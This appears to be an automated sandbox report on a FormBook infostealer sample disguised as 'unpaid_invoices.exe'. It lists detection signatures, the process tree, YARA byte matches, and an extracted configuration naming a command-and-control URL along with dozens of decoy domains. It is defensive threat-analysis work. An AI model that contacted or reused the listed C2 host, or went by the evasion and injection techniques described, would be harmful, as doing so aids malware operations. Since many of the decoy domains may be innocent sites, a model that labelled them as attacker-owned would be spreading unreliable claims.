Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
unpaid_invoices.exe

Overview

General Information

Sample Name:unpaid_invoices.exe
Analysis ID:626537
MD5:fa28e3d61ae49fda627abfc78ca84dea
SHA1:7ecf93e5d4a2873a10510d007b33b4c3460b29d5
SHA256:a7162eb3744c8a0629f9c3967700bf4e015e807340c4e1be3327011a637108c4
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • unpaid_invoices.exe (PID: 6264 cmdline: "C:\Users\user\Desktop\unpaid_invoices.exe" MD5: FA28E3D61AE49FDA627ABFC78CA84DEA)
    • ronkhfyq.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq MD5: 66039B0CB9E9C76FD4CFEA6E9D2B130C)
      • ronkhfyq.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq MD5: 66039B0CB9E9C76FD4CFEA6E9D2B130C)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 260 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
            • cmd.exe (PID: 3840 cmdline: /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 3080 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x6335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x5de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x6437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x65af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.ronkhfyq.exe.d80000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.ronkhfyq.exe.d80000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.ronkhfyq.exe.d80000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        2.2.ronkhfyq.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.ronkhfyq.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.beamaster.info/p0ip/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeVirustotal: Detection: 34%Perma Link
          Machine Learning detection for sample
          Source: unpaid_invoices.exeJoe Sandbox ML: detected
          Source: 1.2.ronkhfyq.exe.d80000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.ronkhfyq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.ronkhfyq.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unpaid_invoices.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unpaid_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ronkhfyq.exe, 00000001.00000003.234061206.000000001A710000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000001.00000003.237833298.000000001A8A0000.00000004.00001000.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.239686577.0000000000E36000.00000004.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303340292.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303914689.00000000010EF000.00000040.00000800.00020000.00000000.sdmp, ronkhfyq.exe, 00000002.00000003.238238247.0000000000B9E000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.303050048.0000000003204000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000011.00000003.304479870.0000000004A09000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\yysuo\kzzcum\izya\0db06ea2233046af83ff72ba291e1f8f\exvtus\fxibtxmq\Release\fxibtxmq.pdb source: unpaid_invoices.exe, 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmp, ronkhfyq.exe, 00000001.00000000.229638861.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, ronkhfyq.exe, 00000002.00000000.235483979.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp, control.exe, 00000011.00000002.499584872.000000000311A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000011.00000002.500336053.00000000050D7000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.462569690.0000000007497000.00000004.80000000.00040000.00000000.sdmp, nss7D29.tmp.0.dr, ronkhfyq.exe.0.dr
          Source: Binary string: control.pdbUGP source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 4x nop then pop edi2_2_0040CA02
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 4x nop then pop ebx2_2_00406EA4
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi17_2_02EECA02
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx17_2_02EE6EA5

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.beamaster.info/p0ip/
          Source: explorer.exe, 0000001B.00000000.491457253.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.451885872.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.468009786.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.466224505.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.465809176.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.450166228.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.449810104.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.464512993.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.490550575.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.443910972.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.441840899.0000000009B83000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.488161679.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491255412.0000000009B66000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491310221.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.493308123.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491580962.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.493220220.0000000009B66000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.450978989.0000000009B80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.488054487.0000000009B82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.464944706.0000000009B6A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.491957407.0000000009B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000001B.00000003.441376750.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442769912.0000000009BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: unpaid_invoices.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: C:\Users\user\Desktop\unpaid_invoices.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040580F

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
